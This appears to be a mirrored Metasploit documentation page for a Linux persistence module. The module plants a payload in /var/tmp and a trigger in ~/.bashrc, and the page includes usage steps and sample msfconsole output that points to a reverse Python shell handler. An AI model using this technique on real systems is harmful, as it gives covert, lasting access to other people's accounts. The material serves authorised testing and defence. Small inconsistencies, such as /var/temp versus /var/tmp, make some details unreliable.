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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/local/
Views: 1904


This module establishes persistence via the Linux Bash profile method. This module makes two changes to the target system. First, the module writes a payload to a directory (/var/temp/ by default). Second, the module writes a payload execution trigger to the Bash profile (~/.bashrc by default). The persistent payload is executed whenever the victim user opens a Bash terminal.

Vulnerable Application

This module has been tested successfully on:

  • Ubuntu 19 (x86_64) running GNU bash, version 5.0.3(1)-release

Verification Steps

  1. Start msfconsole

  2. Get a Meterpreter session

  3. use exploit/linux/local/bash_profile_persistence


  5. run

  6. On victim, open a new Bash terminal

  7. You should get a new session with the permissions of the exploited user account



The path to the target Bash profile. (default: ~/.bashrc)


A writable directory file system path. (default: /var/tmp)


msf5 > use exploit/linux/local/bash_profile_persistence msf5 exploit(linux/local/bash_profile_persistence) > set SESSION 1 msf5 exploit(linux/local/bash_profile_persistence) > exploit [*] Bash profile exists: /home/user/.bashrc [*] Bash profile is writable: /home/user/.bashrc [*] Created backup Bash profile: /root/.msf4/logs/persistence/ [*] Writing '/var/tmp/IgHypGLMglheQ' (126 bytes) ... [+] Wrote payload trigger to Bash profile [!] Payload will be triggered when target opens a Bash terminal [!] Don't forget to start your handler: [!] msf> handler -H -P 4444 -p cmd/unix/reverse_python